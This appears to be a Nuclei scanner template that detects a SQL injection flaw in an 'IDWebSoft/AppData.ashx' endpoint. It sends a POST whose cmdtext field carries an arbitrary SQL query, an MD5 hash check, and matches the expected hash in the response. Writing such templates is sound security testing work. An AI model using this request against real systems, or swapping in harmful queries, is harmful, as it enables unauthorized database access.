id: spEAPAppData-sqli
info:
  name: spEAPAppData-sqli
  author: lemonlove7
  severity: high
http:
  - raw:
      - |-
        POST /IDWebSoft/AppData.ashx HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.1875.129 Safari/537.36
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 99
        
        action=GetDataTableByText&cmdtext=SELECT sys.fn_sqlvarbasetostr(HASHBYTES('MD5', '1'));
    matchers:
      - type: word
        part: body
        words:
          - c4ca4238a0b923820dcc509a6f75849b
    matchers-condition: and
